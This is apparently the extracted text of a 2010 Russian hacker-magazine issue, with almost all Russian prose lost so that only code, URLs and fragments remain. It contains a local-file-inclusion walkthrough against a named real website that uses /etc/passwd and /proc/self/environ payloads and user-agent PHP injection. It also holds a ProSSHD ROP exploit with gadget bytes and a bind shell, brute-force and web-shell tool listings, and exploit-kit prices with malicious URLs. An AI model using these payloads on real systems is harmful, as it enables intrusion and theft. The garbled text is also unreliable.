, mod_rewrite
, URL-
. , :
RewriteRule ^(.+)/(.+)$
php?value1=$2&value2=$3
RewriteRule ^(.+)/(.+)/(.+)$
php?value1=$2&value2=$3
script1.
script2.
-:
RewriteRule ^search/(.+)$ search.php?search=$1
http://www.example.com/stroka1/stroka2
http://www.example.com/stroka1/stroka2/stroka3
http://www.example.com/main/search/stroka_
2. , -
poiska search.php,
. http://www.example.com/main/articles/statya.html
( 3 )
X 07 /138/ 10
065
( )
PHP, ASP Perl,

HTML;
3. ,
mod_rewrite,
( );
4.
(, (/) %2F (hexadecimal
encoding) %252F (double encoding)),
URL- mod_rewrite.
mod_rewrite,
. ,
, Security Through Obscurity,
.
mod_rewrite
(brute-force),
, (rewrite rules) mod_rewrite.
:
( URL (
- Apache 2.x 8192 , IIS
16 384 );
() ;
(
) id, count, ..
( );
( );
(
).
-
mod_rewrite.
1. .
,
index.php, main.php. ,
(, 404 Not Found).
URL-,
-, http://www.example.com/index.php
(RewriteRule ^(.+)$ script.
php?$1). .
066
2. , .
-
, id, file .. ,
:
(id, path, page, debug, cat
.);
(1-5 ) [a-z0-9_] ;
:
"" + " ";
" " + "";
" " + " (_,-)" + "
";
" " + " (_,-)"
+ " ".
, ;
- (param[]).
, :
, PHP- ,
(http://example.com/index.php?param[]=value),
, (
error_reporting level), .
:
GLOBALS (http://example.com/index.php?GLOBALS[var]=
value);
_SERVER (
);
zend_hash_key (
unset()).
3. .

. , , 1,
,
, . .
( XSS, Local File Including, Path
Traversal, etc),
.
, , :
: 0,1,2,.. . X 07 /138/ 10
3 : 0, 1 >1.
,
.
: , ../, a%00 .. ,
,
.
. ,
. ,
:
.
:

.
.
:
(False
Positive ),
,
.
:
. ,
.
,
. ,
, ,

.
,
. ,
10-15 ,
.
URL http://example.com/main/search/stroka_
poiska, ,
stroka_poiska ,
, ,
,
URL-, . .
. (5-9 ),
.

(False Positive).
, URL http://example.com/main/search/test
test.
.
http://
example.com/main/search/test (, <b>test</b> )
, test.
,
.
4. .
http://example.com/script.
php?param1=value&param2=value&&abc=value. URL 8192
( Apache). ,
[a-z0-9] 4 5880 .
3-5 .
5. .
,
.
-

.
:
.
:
.
( )
.
:
,
(, ,
).
.
:
.
:
,

(,
).
- ( 1-2 5-7 ,
1,5-2 4 ).
X 07 /138/ 10
http://example.com/main/search/stroka_poiska,
stroka_poiska
. ,
, .

,
.
:
1. , (
params.txt), (
+ (_,-) +
). ,

(param[]).
2. .
3. (
, ).
4. (, http://example.com/index.php?page=admin)
HTTP://WWW
links

:
owasp.org/index.
php/Double_Encoding
dimoning.ru/kaknapisat-svoy-dvizhokbloga-1.html
webscript.ru/stories/07/02/01/
2099269]
ru.wikipedia.org/wiki/
_
raz0r.name/mysli/
proveryajte-tip-dannyx/hardened-php.
net/globals-problem
hardened-php.net/
advisory_192005.78.
html
wisec.it/vulns.
php?id=10
hardened-php.net/
hphp/zend_hash_del_
key_or_index_vulnerability.html
DVD
dvd
Yummy...

,

:

;

;

;

( ,
, ).
5. , .
..:
MaxPatrol Positive Technologies.
...
-,
mod_rewrite, ,
register_
globals, , (debug)
.. ! z
WARNING
warning

!
,

067

rsimplex.light@gmail.com; http://www.youideas.ru
ProcFS
Web-
PROCFS
, Web- ,
: SQL-, lfi, rfi ..
! , ,
,
, .
.
: Gmail,

Joomla jresearch. ,
local file including (lfi). require_once(),
,
. , ,
. URL jresearch,
, - rediscoverscience.com.
.
, , :
http://rediscoverscience.com/component/jresear
ch/?task=show&view=publication&id=18&controlle
r=../../../../../../../../../../etc/passwd%00
. shadow.
, :).
068

.
, CMS Joomla,
, ,
configuration.php (
, FTP ).
. ,
: PHP (
PHP-).
PHP- ,
.
- . :
PHP-,
, . ,
, ,
,
proc: /proc/self/environ,
/etc/passwd.
X 07 /138/ 10

,
. ,
, :
http://rediscoverscience.com/component/jres
earch/?task=show&view=publication&id=18&con
troller=../../../../../../../../../../../../
proc/self/environ%00
PROCFS
ProcFS ( process file system)

,
Unix-like

.
/proc. /proc
, ,
. ProcFS
Linux, Solaris, BSD, QNX .
ProcFS:
/proc/PID/cmdline
( PID self);
/proc/PID/environ
;
/proc/PID/status ;
/proc/PID/fd ,

;
/proc/cpuinfo
(, , ..);
/proc/cmdline ,
;
/proc/uptime ,

;
/proc/version
, ,
.
X 07 /138/ 10
cpanel

PHP,
:
DOCUMENT_ROOT ;
SERVER_ADDR IP- ;
SCRIPT_FILENAME index.php;
HTTP_USER_AGENT ,
;
HTTP_COOKIE ..
, , , . ,
, , -
PHP-, !
, PHP . c "ja_purity_tpl",
CMS,
<? phpinfo(); ?>. /proc/self/
environ .
, , -
.
"__utma" <? phpinfo(); ?> :
.
, ,
user-agent. ,
<? phpinfo(); ?> PHP, PHP.
configuration.php, , ,
user-agent ,
:
<? readfile("/home/redisco3/public_html/
configuration.php"); ?>
/proc/self/environ.
,
configuration.php.
WARNING
warning
!
.
,

HTTP://WWW
links
securitylab.ru/
vulnerability/392546.
php
packetstormsecurity.org/1003-exploits/
joomlajresearch-lfi.
txt PoC-

jresearch
xakep.ru/
post/49508/default.
asp ][

:

local
remote file include
xakep.ru/magazine/xa/111/146/1.
asp ][

069
HTTP-
Include cookie
phpinfo()
PROCFS
.
CMS , , .
. ,
proc, : /proc/cpuinfo
, xeon'e, /proc/version
:
Linux version 2.6.31.9-grsec (root@web55.justhost.
com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46))
#1 SMP Thu Feb 25 02:14:17 CST 2010
, ,
cpanel. ,
FTP.
, .
, :
-
070
()
. , ,
, .
:).z
X 07 /138/ 10
, Digital Security a.sintsov@dsec.ru
ROP
ROP
ROP
ROP
ROP
VIRTUAL PROTECT
Param1
Param2
Param3
Param4
JUMP ESP
NOP
NOP
SHELLCODE
0x06060101
pop ecx
retn
0x06060201
1.
2.
3.
pop eax
retn
0x06060101
0xBAADF00D
0x06060201
0x01020304
0x06060301
0x06060301
mov [eax], ecx

retn
ROP:

ROP,
-
, , ROP.
(
, ..) permanentDEP ASLR.
?
, ! DEP ASLR.
,
, Microsoft. ret2libc
DEP , permanent DEP + ASLR
JIT-SPRAY ( JIT-, , Flash). , ,
,
,
. JIT SPRAY X 07 /138/ 10
, , ,
, ROP,
. , ,
Flash JIT-SPRAY.
, , ; , , , malware
Acrobat Reader (CVE-2010-0188)
. , pwn2own
iPhone PHP 6.0 DEV.
,
.
071
0x06060101 // AAAA
0xBAADF00D // BBBB
0x06060201 // CCCC

0x01020304 // DDDD
eax
0x06060301 // EEEE

: 0x61616161!
--...
HTTP://WWW
links
cseweb.ucsd.
edu/~hovav/dist/
geometry.pdf

ROP
(2007 ).
blip.tv/file/3564232

Source Boston 2010.

ROP.
dsecrg.com
ret2libc.
,
.
( , , ),
hardware-permanentsuper-puper-DEP. hardwareDEP ret2libc . ,

. ,
. : . , , , ,
, .. ,
API-, , ,
, ,
. - , ,
.
, . ,
- (, 0xBAADF00D)
(, 0x01020304)?
(
),
.
:
pop ecx ;
pop eax ;
mov [eax], ecx ;
,
, ,
,
.
0x06060101:
0x06060102:
. . .
0x06060201:
0x06060202:
. . .
pop ecx
retn
pop eax
retn
0x06060301: mov [eax], ecx

0x06060304: retn
072

ecx
retn
retn
,
:
[BUFFER][RET]
ROP :
[BUFFER][AAAA][BBBB][CCCC][DDDD][EEEE]
, , ,
. -,
, -,
( ,
SEH-, ROP
). , ROP-
. C
. ,
.
? ,
VirtualProtect (
) , , WriteProcessMemory (
). ASLR
, ,
? - , .
, ASLR ,
,
, DLL (
FireFox,
Windows 7 ASLR+DEP pwn2own 2010). ,
,
ASLR ,
.
(Alex Sotirov)
BlackHat 08.
DLL.
.
ROP REST ON PAIN
ROP-. . ActiveX
ProSSHD
1.2. SSH- Windows.

SCP-. S2 Crew,
. :
491 , 4
. ,
, ,
495 . :
[491 'a' 0x41][RET=EIP]
X 07 /138/ 10

ASLR
[AAAAAAAAAAAAAAAAAAAAAAAA]
^
ESP
, [RET] [AAAAAAA]
ROP-. , , .
, . , (/GS)
SEH,
, , , ESP . (SEH- )
, ESP (
) ,
RETN ROP. ,
- :
add esp, 0xXX
retn
- :
mov esp, ecx
retn
;
xchg ecx, esp
retn
, . Immunity Debugger
orelan0d3r.
, ,
, ROP ,
. ,
, ASLR, Windows 7.
, ProSSHD
: MFC71.DLL MSVCR71.DLL.
ROP;
DEP + ASLR. DEP?
,
VirtualProtect() 0x7C3528DD (MSVCR71.DLL).
; - ASLR ,
MSVCR71.DLL . ,
,
. , ,
, VirtualProtect.
VirtualProtect :
VirtualProtect(
IN
LPVOID lpAddress,
//
IN
SIZE_T dwSize,
// 0x1
IN
DWORD flNewProtect,
// 0x40
IN
PDWORD lpflOldProtect // ,
X 07 /138/ 10
( )
);

DEP, . - ROP.
: VirtualProtect MSVCR71.
DLL, , ,
RETN, EBP.
( ),
, EBP-0x58 LEAVE
.
7C3528DD
CALL
DWORD PTR DS:[<&KERNEL32.VirtualProct>
7C3528E3
LEA ESP,DWORD PTR SS:[EBP-58]
7C3528E6
POP EDI
7C3528E7
POP ESI
7C3528E8
POP EBX
7C3528E9
LEAVE
7C3528EA
RETN
, :
0x00:0x7C3528DD
0x04:ADDRESS_1
0x08:0x00000XXX
0x0C:0x00000040
0x10:ADDRESS_2
------
VirtualProtect

READ_WRITE_EXECUTE
, ESP
. 4 .
VirtualProtect MSVCR71.DLL.
, ,
. ,
, ,
.
, ,
. ,
, VirtualProtect . .
.
, . , ,
, - .
.
0x0012XXXX.
. -
ROP. . JIT SPRAY , DEP
. ROP-
100% . :
0x000:ADDR_1
0x004:ADDR_2
. . .
0xX00:ADDR_X
0xX04:0x7C3528DD
0xX08:ADDRESS_1
-- ROP-
-- VirtualProtect
073

0xX0C:0x00000XXX
0xX10:0x00000040
0xX14:ADDRESS_2
0xX18:RET_ESP
0xX1C:0x90909090
0xX20:SHELLCODE
-- 0xX0C
-- NOPs
ROP-
VirtualProtect 0xX08, 0xX0C, 0xX10, 0xX14. ,
. ProSSHD.
, EDI EBP
ESP.
, EDI EBP ,
. EDI ESP, ,
1049 . ROP-, ,
ROP- VirtualProtect,
RETN.
NOP ROP.
ITS ALIVE!
. , RETN.
. ,
.
, , ,
. ?
, , orelan0d3r
ROP- ()
, . (Peter Van Eeckhoutte
corelanc0d3r) -
, . ,
RETN

. ,
ROP- . ,
-
EAX, . EAX .
,
EDI (, ) EAX EDX.
,
EAX, EDX. .
, .
(
).
VirtualProtect,
0x40, EAX, , ,
ECX. EAX . ,
EAX
ECX.
"\x27\x34\x34\x7C".
POP ESI / RETN 10
"\x33\x33\x33\x33".
# MOV ECX, EAX / MOV EAX, ESI /

# ESI
, ECX, EAX -
0x40. , EAX -0x40, NEG EAX.
. , -0x40=0xFFFFFFC0,
, ,
POP EAX. 16 ,
RETN 0x10.
"\xC1\x4C\x34\x7C".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\xC0\xFF\xFF\xFF".
"\x05\x1e\x35\x7C".
#
#
#
#
#
#
#
#
#
/ RETN
-0x40: EAX
NEG EAX / RETN
. EAX 0x00000040.
ECX ,
VirtualProtect,
.
"\xc8\x03\x35\x7C".
# MOV DS:[ECX], EAX / RETN
ECX EAX.
"\x40\xa0\x35\x7C".
# MOV EAX, ECX / RETN

VirtualProtect (-0x40).
, .
EAX 12 ( ),
( 4 )
.
"\xA1\x1D\x34\x7C"x12.
,
. .
POP EAX
# DEC EAX
/ RETN
EAX EAX+4.
.
$fuzz = "\x41"x491 .
"\x08\x94\x16\x7C".

ROP-. ( EDI) EAX.
# MOV DS:[EAX+0x4], EAX / RETN
EAX 4 .
"\xB9\x1F\x34\x7C"x4.
"\x9F\x07\x37\x7C".
ESI / RETN
8 (
EDI ESI), 8 ,
.
"\x11\x11\x11\x11".
"\x22\x22\x22\x22".
074
# INC EAX / RETN
# MOV EAX, EDI / POP EDI / POP
# EDI
# ESI
EAX ,
EAX+4 ,
. ,
, . -, 1
.
.
"\xB2\x01\x15\x7C".
# MOV [EAX+0x4], 1
X 07 /138/ 10

ASCII-.
,
VirtualProtect. -
. ESP .
EAX 16 .
"\xA1\x1D\x34\x7C"x16.
# DEC EAX
ROP
/ RETN
ECX.
"\x27\x34\x34\x7C".
POP ESI / RETN 10
"\x33\x33\x33\x33".
"\x40\xa0\x35\x7C".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
# MOV ECX, EAX / MOV EAX, ESI /

#
#
#
#
#
#
#
ESI
MOV EAX, ECX / RETN
ECX. EAX ,
EAX+20 , , (
0x40).
"\xB9\x1F\x34\x7C"x4.
# INC EAX / RETN
.
"\xE5\x6B\x36\x7C".
# MOV DS:[EAX+0x14], ECX
412 .
4 VirtualProtect
408
.
,
, . ,
JIT SPRAY, ,
. ,
0x7c345c2e ANDPS XMM0, XMM3.
2 ,
PUSH ESP / RETN.
, RETN , EIP.
"\x30\x5C\x34\x7C".
# PUSH ESP / RETN
, .
NOP.
"\xBA\x1F\x34\x7C"x204 . # RETN
"\x90"x14 .
# NOP
, VirtualProtect.
"\xDD\x28\x35\x7C". # CALL VirtualProtect / LEA ESP,
[EBP-58] / POP EDI / ESI / EBX / RETN
, ( bind shell 4444

).
$shell;
, . ROP-.
"AAAABBBBCCCCDDDD".
12
. :).
"\x1A\xF2\x35\x7C".
"XXXYYYZZZ123".
X 07 /138/ 10
# ADD ESP, 0xC / RETN

# , -
. ,
, .
, .
, : 0day
, 300%
0day iDefense ZDI. , , ,
. , , $$$. ! :) z
075

icq 884888
X-TOOLS

: ArxFuckingHash3
: WINDOWS 2000/XP/2003
SERVER/VISTA/2008 SERVER/7
Bind port/Backconnect ( );
;
.
- Perl
: ARXWOLF

webxakep.net
-.
, -
(md5, MySQL, Sha1)
. ?
-
,
? !
ArxFuckingHash3, !

.
:
(10 10 );
md5, MySQL, Sha1 ;
-
( servers.ini);

;
;
;
;
;
( ./help).
-
,
webxakep.net/forum/showthread.php?t=4753.
: PPS 1.0 PERL

WEB-SHELL
: *NIX/WIN
: PASHKELA
-,
PHP.
076

.
- PPS 1.0 , .

PHP-:
(
"root");
;
;
, , , ,
;
;
chmod, touch, zip, unzip

;
;
MySQL-;
backconnect;
Perl- -;
;
POST-.

forum.antichat.ru/
thread198119.html.
: CGI WEB SHELL

: *NIX
: ORB
-,
, PHP,
CGI web shell ,
- :
- Python

http://forum.
antichat.ru/showthread.php?t=147269.
: PROXY SCANNER
: *NIX/WIN
: SHARKY
, ,
- -.

Proxy Scanner Sharky.

IP-, .
,
,

.
Proxy Scanner'
:
1. proxyscanner.pl;
2. :
Start IP ( IP , ,
192.168.1.1);
End IP ( IP , ,
192.168.255.255);

;
, , , touch-, chmod-;

;
;
Python'e
-;
X 07 /138/ 10
Port ( , , 3128);
Timeout ( , , 10);
Threads (, , 50);
File for good proxies (
, , proxies.txt).
,
, enjoy!
: LAMESCAN2 ANTIRADMIN
: REDSH
ins ;
f9
;
shift+f9 ;
f5 ;
f7 HTML;
f2 ;
f3 ;
ctrl+ins,

.
: http://redsh.
tk
.
: RSAEMAILCHECKER 2.0
:WINDOWS 2000/XP/2003
: RSARELIABLES

LameScan2 .
:
;
;

-,
, up, down error
(
,
, -
);

;
.csv
;

CSV HTML;
SDK;

IP-.

antiradmin LameScan2. ,
radmin 2.0, 2.1 2.2 .
:
;
;

;
( ,
, ).

:
X 07 /138/ 10
e-mail
rsaEMailChecker
e-mail
. :

;
;
;
;

e-mail ;
(
);
POP3;
;
( );
;
;
(user@
server.domen;password user@server.
domen:password);
.Net Framework 2.0 .
:
,
;
... ,
;
"connected == false" ,

;
"invite == false" ,

(, POP3- /
);
"user == -err" ,

POP3-;
"bad" ,
;
"good" ,
.
,
webxakep.net,
http://webxakep.net/
forum/showthread.php?t=6348.
: JBBL JABBER BRUTE

BY LYTGEYGEN V.0.1
: LYTGEYGEN
? :). ,
jbbl Jabber-.
:
Visual Basic
xmpp;
( 100 );

;
Jabber-
;
good.
txt;
;
Jabber-
.

: forum.asechka.ru/showthread.
php?t=119636.z
077
MALWARE
VIRUSES
vaber@inbox.ru
: AVG, AVIRA AVAST?

] [ , ,
. , -
: autorun-,
. : AVG, AVIRA
AVAST. ,
.
,
. , , . IE6
IE7, Adobe (Flash Player, PDF Reader),
RealPlayer JAVA. IE,
][.
, , ,
.
iframe,
, .
,

, .
:
Eleonore Exploits pack
Phoenix exploit kit
NeoSploit
YES exploit kit
Siberia Exploits kit
078
Seo Sploit pack

Crimepack Exploit System
, , , . , -,
. , ,
.
, ,
.
MDAC (MS06-014),
2006 . IE6
.
, , malware. ,
IE6/7
Adobe Acrobat Reader,
Oracle Corporation JAVA.
IE,
.
Acrobat Reader:
Adobe Acrobat Reader
Adobe Collab.collectEmailInfo CVE-2007-5659
X 07 /138/ 10
>> coding

,
.
5 20%, 10%.

, , .
Phoenix exploit pack
: MDAC, MS Office Snapshot, JRE, Flash10,
CVE-2010-0806, Adobe Acrobat Reader
( 2.0): $400
Crimepack Exploit System

: MDAC, DSHOW, MS09-002, Flash10, Adobe
Acrobat Reader, JRE
( 2.8.1): $400
: MDAC, JDT, PDF collab.getIcon, PDF collab.
collectEmailInfo, PDF NewPlayer, Java GSB 1.5/1.6
( 1.4.1): $1500

IP. /
IP
$50.

: $50-80
.
Adobe
Adobe
Adobe
Adobe
Util.printf CVE-2008-2992
GetIcon CVE-2009-0927
Media.newPlayer CVE-2009-4324
Pdf libtiff CVE-2010-0188
JAVA:
JAVA
Deserialize CVE-2008-5353
GetSoundBank CVE-2009-3867
?
.
,
( ,
? :)), , .
,

( iframe),
- .

, . ,
:
X 07 /138/ 10
KAV
1. ,
;
2.
,
;
3.
;
4. ;
5. ( , )
;
6.
.

.
,
, ,
. ,
.
,

Drive-by, , .
AVAST! Internet Security, Kaspersky Internet Security,
ZoneAlarm Extreme Security, HIPS DefenseWall .
,
free-.
: AVIRA, AVG AVAST!. ,

, ,
Kaspersky anti-virus.
, ,
:
DVD
dvd

Drive-by

.

,
,

OllyDbg

TDL3 (TDSS, TidServ,
Alureon).
AVASt!

079
MALWARE
Phoenix exploit pack

on-demand

-
,

AVG

on-demand

-

phpnuke.org
on-demand

-
,

, . :
1. Vmware Windows XP SP3 32-bit
Internet Explorer 7.0.5730.13 (
, ).
Adobe Reader 8.1.1 JAVA jre 1.5.0.10. ,
AVIRA

on-demand
KAV

url url
exploits pack
kjtkmr6.com/kjt/index.php
ykttd.com/ykt1/index.php?s=738098
d66710721283d32479eed007d7
ndpwrgg.info/images/k.html
bteldd.info/cgi-bin/class.phtml
portalmeslive.com
ajitkkravmr.com/ld/prox/
repmycitys.com/i1/index.php
xgazz.biz/var/index.php
Phoenix exploit kit
tossedcabin.net/start.php
YES Exploit kit
fxeurostar.org
ofruv.com/bet/index.php
bmw-pad.com/p/i.php?user=admin
directs to Phoenix
Phoenix exploit kit
Siberia Exploit Pack
d.poafirst.com/index.php
Seo Sploit pack
maycoffe.com/x00x/index.php
Phoenix exploit kit
080
directs to NeoSploit
NeoSploit
directs to NeoSploit
NeoSploit
Phoenix exploit kit
md5
c57f8af1fd65ab10849d
86ce9aef155a
fa69e6065061a3b67032
32da2bdaea5a
2A9728B5CF7FC2067C
08DC83D3527F49
4AC42220FCDB3FC6E
74E1DB751258F68
9275294ddfe421cd065a
9f2b374f6979
c6fe1134e68465a9baaf
2e4eaddc3807
5633FF368E1D45DC4D
2021FB84FD71B5
a4a90c515c6ac4cbbfdf
511644bec3c7
e391bac860e8b97f548c
5848ed6801da
7A77A4BBE8FCF7A02
F7C2FF33B54321A
e048facbaeef0fe3eab6
0e44af9c40f2
AVIRA
10.0.0.567
AVAST
AVG AVP 9.0.0.736
5.0.507 9.0.814
(a,b)
X 07 /138/ 10
>> coding
AVIRA :)
, Adobe Reader
JAVA.
2. ,
. , .
:). ,
.
3. snapshot, , .
4. , malwaredomainlist.com
URL, exploit pack.
, , payload
( ,
, ) ,
, .
exploit pack .
5. snapshot , .
, .
,
, .
malware -, ,
, :). . / .
.
,
, .
X 07 /138/ 10
, Kaspersky AVAST! Drive-by. ,

:). ? , ,
? ! .

malware, , :
1. ;
2. Windows ,
;
3.
, .
Adobe (Acrobat
Reader, Flash Player), JAVA, WinZip, Firefox, Opera,
Foxit, RealPlayer;
4. Sandbox
( ) . , ;
5. , ,
, ,
, ;
6. . z
081
MALWARE
VIRUSES

,

Dr. Web
.
?
- .
, , -
, , .

?
- 1997
IBM PC.
, , !
,
DOS, Win3.1,
Win9x. , .
?
,
.
Far Manager ( , , ),
Hiew hex-
. , .
IDA Pro + Hexrays ,
reverse engineering.
OllyDdbg WinNT.
, .
. , ,

,
, .

, ?
,
. ,
, , Dr.Web.

,
. , , Dr.Web Virus Chaser.
-,
(virustotal.com/jotti.org/virscan.org ..),
-
082
. , honeypots
, . .
.
:
,
, ,
, .
, . . , ( )
.
,
, .
. , , .
, , .
, .
, , .
, .

. .

?
Linux.Hasher.
, Linux-, ELF-.
.
, , .
.hash,
ELF
. Linux.Hasher
,
.
219 . z
X 07 /138/ 10
8.5
DVD
!
660 . !
? ?
.
.
( )

.
2100 .

72 000 QIWI ()
.
?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru
1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,

Mifrill mifrill@real.xakep.ru
,
?
. , ? ! VoIP , ,
Skype. - .
SKYPE,

XIX-XX ,
,
, . ,
(, )
,
- .

, . : 15
,
,
074
084

- ( ,
,
, ,
, ).
,

, .
, 1964 AT&T
-,
. ,
Picturephone Mod I
-
. , ,
. ,
, 3
: (
1 )
. 2 .
.
-
$16 3 , $27,

. , 1968 .
, .
-, ,

.
,

. ,
X 07 /138/ 10
SKYPE ()
.

60- ,
80-,
SKYPE 4.0
X 07 /138/ 10
ISDN (Integrated Services

Digital Network) ,
, ,
. ,

Voice over IP (VoIP) 90- .
,
Internet
Phone, VocalTec. Internet Phone
1995 , ,
IM+,
. , ,
omigod, its
magic!!11. , ,
, (
VocalTec
,
).
, , ,

Internet Phone
. -
,
085
IP-,
VocalTec Telephon
Gateway (VTG).
1997
,
,
.
1999 SIP (Session
Initiation Protocols),
1996 IETF,
. H.323
, ,
,
.

, Skype.
CU-SEEME
SKYPE
1967 ,
, - .
, 1995
DigiPhone, .

.
90-
CU-SeeMe, Mac,
Windows. ,
CU-SeeMe 1994 Endeavor NASA
.
VoIP,
IP-, ,
1996 . International
Telecommunication Union
,
086
,
,
.323,
50 .
,
- ,
.
,
, Internet Engineering Task Force (IETF),

,
Realtime Transport Protocol (RTP),
.323.
VoIP
:
1996
VocalTec
Dialogic.
-
Skype
,
(Ahti Heinla), (Priit
Kasesalu) (Jaan Tallinn).
, , - ,
Skype
(Janus Friis)
(Niklas Zennstrom).
, .
,
, ,
. , .
, 2000-

P2P- KaZaA,
.
Skype, IT-

, ,
.
?
. ,

( KaZaA, Skype),
. , Skype ,
, .
,
Skype ,
.
Skype
2002
Draper Investment Company,
:
Skype.com Skype.net
,
-
2003 . ,

X 07 /138/ 10
SKYPE IPHONE
Skyper (
Sky peer-to-peer),

Skype, Skyper
.
, Skype
,
,
? , IP-, Skype

P2P-,
,
. ,
:
,

PICTUREPHONE II AT&T
X 07 /138/ 10
VOIP .
(
, ). Skype

, , NAT

(
).
Skype IP-
,
SIP,
.

Skype, SIP ,
.
SIP HTTP-
SIP, HTTP,
,
.
,
SIP, , ,
.
Skype, SIP ;
,
,
.
,
,

(, ,
). SIP

-.
Skype SIP, , Skype-
SIP.
, : Skype ,
P2P- (
AES-256,
, ,
1024- RSA.
Skype
1536- 2048-
RSA), SIP
.
,
Skype
UDP,
TCP-, , Skype
HTTP-.
,
Skype
, Skype, , . .

, -
087
SKYPE
SKYPE
, ! , ,
, ,
,
Skype .
Skype , . 2007
][ ,
Skype: .
: Skype

, ,

.
, .
Skype , ,

Skype-.
Skype , :
.
,
2003 , Skype 10
, IM,
.
,
,
. , Skype
SVOPC (16 ), AMR-WB (16 ),
G.729 (8 ) G.711 (
ILBC ISAC), (30-60 /)
,
.
2003 ,
Skype .

. , , ,
SMS
088
,
Skype
:).
,
, 2005 ,
(74,7 .
10,8 . ),
eBay .
, Skype
,
:
Skype
560 . ;
Skype
,
;
VoIP;
Skype - Skype- ,
,
Skype.
,
Skype,

, , .
,
.
,

. , ,
, .
,

Tele2, 1996
.
,
, 2000 ,
KaZaA.
,
,
,
.

,
.
Napster, ,
, ,
KaZaA.
-, ,

.

,
,
.
,
,
, KaZaA .
,
KaZaA
Sharman Networks,
. -
, -
, KaZaA.

, Joltid,

.
,
.
X 07 /138/ 10
1878
,
Skype.
,
Skype,

(
, KaZaA)

. ,
,
Skype CEO
2007 ,
eBay.
, eBay. ,
2005 ,
Skype eBay
2,6
1,5
,
Skype (
eBay ). , ,
, , ,
,

. - .

Joost, ,
Skype
. , , :
53
400 , Skype 2008
33 ,
eBay .
Skype
, , 2009

, ,
X 07 /138/ 10
Skype
.
.
,
eBay Skype (

:
),
2009
. , Skype, eBay

. -,
Joltid. ,
Skype ,
,
. ,
New York Times, , ,
Skype

,
.
,
eBay
Joltid , ,

. .

.
eBay,
, 65%
Skype Andreessen
Horowitz 2 . .
,
Skype,

$75 .
. ,

( , eBay 35%
!),
Joltid ,
Skype. , ,
, , eBay
Skype ,
.

, 2009 .
,
. eBay, - - Skype,
.
,
, 14%
Skype.
,
eBay
.
, , ,
,
. , Skype ,
, . ,
Joltid
, eBay
Skype .
,

, ,
,
Joltid
.

: Skype
?, , ,
. -,
-
(
Skype
, ).
,
Skype, VoIP-

,
. , Skype :
VoIP,
,
, .
-
,
, Skype , ,
,
. z
089
UNIXOID
zobni n@gmail.com
Qubes OS

Qubes OS
Linux
- .

, ,
, .
,
. Qubes OS
, .

?
, Qubes
OS, ,
-
090
,
.
:

;
;
(
).

X 07 /138/ 10
Qubes OS
?
. -,

Blue Pill (http://bluepillproject.org),
,
, .
eWeek (http://eweek.org) ,
2006 (Five Hackers who Put a Mark on 2006).
2009 Rafal Wojtczuk
Intel TXT Intel
System Management Mode (SMM). Invisible Things Labs (http://invisiblethingslab.com),
.
( ) ,
,
.
( ).
,
,
(
), , .

.
,
(Flawfinder,
X 07 /138/ 10
RATS, Skavenger, lint ..). , OpenBSD

,
, . Coverity
(Coverity Prevent) , .

( )
, .
, Microsoft
BSD-.
.
, , , .

.
, .
,
.
, ,
(
root).
,
.
,
,
,
, nobody
SELinux BSD Jail.
(-, ),
(
,
: ,
..).

, ,
, . ,
.
,
091
UNIXOID
,

. ,
(
, , )
. ,
( ),
.

, ,
.
,
. -, ,
-,
.
.
? .
: QUBES OS
Qubes OS (http://qubes-os.org) Linux ( ),
(Joanna Rutkowska),
. Qubes OS
,

.
Xen (www.xen.org),
, Linux, , ( )
. Qubes OS .
( )
, .
( , TCP/IP, DHCP- ..)
, .
Intel VT-d.
(Dom0 Xen)
, X Window,

( ).
Xen Qubes OS ,
092
.
, ,
( , )
Linux. ,
,
Intel VT-d, , ,
, .

Qubes OS
, .
Linux
.
, Qubes OS :
Qubes OS ( Xen HVM), ,
, , , .
Qubes OS , , ,
,
. ,
Entertainment : , YouTube.
Shopping -.
Banking - . , ,
- Entertainment,
, Shopping
Banking, . ,
(
Qubes OS, ).

. ,
,
Linux.
copy-on-write (
Device Mapper).
COW-
.

( /home, /usr/local, /var). COW-
LUKS (The Linux Unified
Key Setup),
X 07 /138/ 10
.
.
,
.

(Xen Dom0)
Qubes OS. , .

: ,
,
( , TCP/IP, DHCP-, ,
..), :
.
:
XenStore, ,
GUI-, X Window
KDE ( ,
, GUI,
).

Qubes OS.
3D-,
,
() . ,
, Qubes OS
,
. ,
.
(,
,
, ).
GUI X- (
), . ( ),
XGetImage X Window , Xen Ring buffer protocol, .
, AppViewer,
,
XRenderComposite.
Qubes OS ,
, .
X 07 /138/ 10
Qubes OS

.
TCP/IP, , ,
WiFi- ,
.

, .
Qubes OS (Network
Domain) , . ,
,
Linux-, ,
, .
, ,
: ,

. , ,
, , ,
Entertainment, .

(
Qubes OS).
, Xen
.
eth0.
vifX.Y, X , Y . Xen vifX,Y
(, wlan0)
bridge,
, . Qubes OS,
, .

,
,
.

, ,
, .
, ATA SCSI, USB-,
093
UNIXOID
Qubes OS
.
. Qubes OS
,
(Storage Domain).

.
Linux,
, ( ). ,
, :
.
.

, . , .
, Intel TXT. , , ,
.
, , , . , , Xen
.

Qubes OS :
1. ,

( ).
Intel TXT (Trusted Execution
Technology). ,
TPM (Trusted Platform Module).
094
2. , initramfs. , , ,
, TPM
.
3. initramfs ,
.
,
.
,
, keys.gpg, , .
4. keys.gpg initramfs .
5. Qubes OS , , keys.gpg.
6. ,
. initramfs
, , X Window, .
7. .
.

Qubes OS.
Qubes OS ,
- . ,
, ,
, ,
, Singularity (http://research.microsoft.
com/en-us/projects/singularity/),
. .z
X 07 /138/ 10
UNIXOID
Adept adeptg@gmail.com
Linux
,
Linux ?
, , ,
, , !
.
, ,

. Linux . ,
Linux , 99%
, , ,
( , ,
).
, , Linux.
Ramen ( wu-ftpd
Red Hat 6.2 7.0), Badbunny
OpenOffice .

Linux. ,
,
, .
Linux-.

Linux.
Linux-
096
.
Linux 1-2%,
security- .
,
,
-.
Linux.
, , -
,
( , , ,
-).
,
Linux .
.
,
.
,
(,
).
Dr.Web Linux,
6
.
32-, 64- .
.run-,
.
.
,
- 30 (-
1 4 ).
Gnome DrWeb
( :
), ,

,
.
CLI- ,
:
X 07 /138/ 10
